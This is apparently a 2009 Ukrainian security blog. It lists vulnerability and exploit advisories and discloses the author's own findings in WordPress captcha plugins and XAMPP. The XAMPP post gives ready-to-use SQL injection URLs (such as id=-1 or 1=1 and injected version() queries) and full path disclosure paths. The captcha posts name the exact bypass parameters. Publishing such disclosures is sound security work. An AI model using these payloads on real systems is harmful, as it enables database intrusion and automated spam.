Добірка уразливостей

17:34 11.08.2009

В даній добірці уразливості в веб додатках:

  • CenterIM <= 4.22.3 Remote Command Execution Vulnerability (деталі)
  • PhpWebGallery 1.3.4 Multiple Vulnerabilities (XSS/LFI) (деталі)
  • Surgemail 38k4 IMAP server remote stack overflow (деталі)
  • VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman (деталі)
  • Advanced Electron Forum <= 1.0.6 Remote Code Execution (деталі)
  • Annuaire Telephonique v1.0 Sensetive Files (MDP) (деталі)
  • PHP pro bid v 6.04 SQL injection (деталі)
  • LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities (деталі)
  • cyask 3.x Local File Inclusion Vulnerability (деталі)
  • Sama XSS Bug (деталі)

Уразливість в Dumb math captcha плагіні для WordPress

23:51 08.08.2009

Вчора, 07.08.2009, коли я оприлюднив уразливості в Dumb math captcha для WordPress, я виявив нову Insufficient Anti-automation уразливість Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

При передачі параметра action зі значенням commentopenid, значення відповіді капчі не перевіряється, що дозволяє обійти капчу (на сторінках записів). Це автор плагіна зробив чорний хід (backdoor) в капчі, який може бути використаний для її обходу. Така собі spamer friendly капча :-) .

Dumb math captcha CAPTCHA bypass.html

Уразлива версія Dumb math captcha 1.0.

Основи хакінга

22:40 08.08.2009

В своїй презентації The fundamentals of Hacking, Jen Johnson та Miria Grunick розповідають про основи хакінга в Інтернеті.

CSRF, SQL Injection та Full path disclosure уразливості в XAMPP

19:23 08.08.2009

01.07.2009

У червні, 27.06.2009, я знайшов Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

08.08.2009

CSRF:

http://site/xampp/cds-fpdf.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Добірка експлоітів

16:12 08.08.2009

В даній добірці експлоіти в веб додатках:

  • Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC (деталі)
  • QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability (деталі)
  • PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability (деталі)
  • PHP-Fusion Mod Members CV (job) 1.0 SQL Injection Vulnerability (деталі)
  • CuteNews <= 1.4.6 (ip ban) Command Execution Exploit (admin req.) (деталі)
  • Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit (деталі)
  • PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability (деталі)
  • XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit (деталі)
  • Fast FAQs System (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Photobase 1.2 (language) Local File Inclusion Vulnerability (деталі)
  • Silentum Uploader 1.4.0 Remote File Deletion Exploit (деталі)
  • fttss <= 2.0 Remote Command Execution Vulnerability (деталі)
  • Social Engine (browse_classifieds.php s) SQL Injection Vulnerability (деталі)
  • PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability (деталі)
  • Exploits Ezphotogallery Multiple Vulnerabilities (Xss/Login Bypass/Sql injection Exploit/File Disclosure) (деталі)

Уразливості в Dumb math captcha для WordPress

23:56 07.08.2009

Сьогодні я вияснив, що капча плагін для WordPress, в якому я виявив дірки, що використовуться на сайті www.developers.org.ua, зветься Dumb math captcha. Тобто це не окремий php-скрипт від власників www.developers.org.ua (бо адміни сайта так мені й не відповіли), а саме плагін для WP, який використовувався на декількох сайтах. І враховуючи, що вихідний код цього плагіна доступний в Мережі, його також можуть використати інші люди.

Тому Insufficient Anti-automation та Full path disclosure уразливості, що я знайшов у січні, 22.01.2008, мають місце у Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

Капча на сторінках записів вразлива до Constant values bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одне і те саме значення параметра dumb_captcha (dumb_captcha = 9).

Full path disclosure:

http://site/wp-content/plugins/dumb_captcha.php

Уразлива версія Dumb math captcha 1.0.

Безпека плагінів для WordPress

22:42 07.08.2009

Окрім уразливостей в коді самого WordPress, часто уразливості мають місце в плагінах для WP. Тому розробники плагінів для даного движка повинні також слідкувати за безпекою.

Як я вже зазначав стосовно плагінів для WordPress - уразливостей в них вистачає, тому власникам сайтів на WP варто також слідкувати за плагінами, які вони використовують, і по можливості перевіряти їх безпеку. Сам я знаходив чимало уразливостей в різноманітних плагінах для WP, а також регулярно публікую інформацію про уразливості в плагінах для WordPress знайдених іншими секюріті дослідниками (таких добірок я опублікував вже 19).

Серед знайдених мною уразливостей в плагінах:

Після публікації даного запису я ще опублікував наступні уразливості:

В даних 85 описах уразливостей наводяться численні Cross-Site Scripting, Insufficient Anti-automation, Cross-Site Request Forgery, Directory Traversal, Arbitrary File Deletion, Denial of Service, Full path disclosure, Insufficient Authorization, Information Leakage, Abuse of Functionality, HTTP Response Splitting, SQL Injection, CRLF Injection, Redirector, Code Execution, Content Spoofing, Arbitrary File Upload та Security bypass уразливості в 73 плагінах для WordPress.

Численні уразливості в Microsoft Internet Explorer

19:27 07.08.2009

31.07.2009

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 5.01, 6, 7 та 8 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server.

Численні ушкодження пам’яті, крім того, додане тимчасове рішення для уразливості бібліотеки ATL.

  • Microsoft Security Bulletin MS09-034 - Critical Cumulative Security Update for Internet Explorer (972260) (деталі)

07.08.2009

Додаткова інформація.

  • Microsoft Internet Explorer getElementsByTagName Memory Corruption Vulnerability (деталі)
  • Microsoft Internet Explorer CSS Behavior Memory Corruption Vulnerability (деталі)
  • Microsoft Internet Explorer HTML TIME ‘ondatasetcomplete’ Use After Free Vulnerability (деталі)

Добірка уразливостей

16:18 07.08.2009

В даній добірці уразливості в веб додатках:

  • Microsoft SQL Server - Corrupt Backup File Heap Overflow (деталі)
  • Microsoft SQL Server Restore Integer Underflow Vulnerability (деталі)
  • Important Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203) (деталі)
  • Horde, Popoon frameworks common input sanitization errors (XSS) (деталі)
  • Stash v1.0.3 Admin bypass / Remote File Disclosure (деталі)
  • Multiple Vulnerabilities: LedgerSMB < 1.2.15 (деталі)
  • Pro2col StingRay FTS login username cross site scripting (деталі)
  • Multiple vulnerabilities in Nooms 1.1 (деталі)
  • minb Remote Code Execution Exploit (деталі)
  • PhsBlog v0.2 Bypass Sql injection Filtering Exploit (деталі)

Уразливості в Subscribe To Comments для WordPress

23:55 06.08.2009

У грудні, 11.12.2008, я знайшов Cross-Site Request Forgery, Cross-Site Scripting та CRLF Injection уразливості в плагіні Subscribe To Comments для WordPress. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в Subscribe To Comments WordPress plugin.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.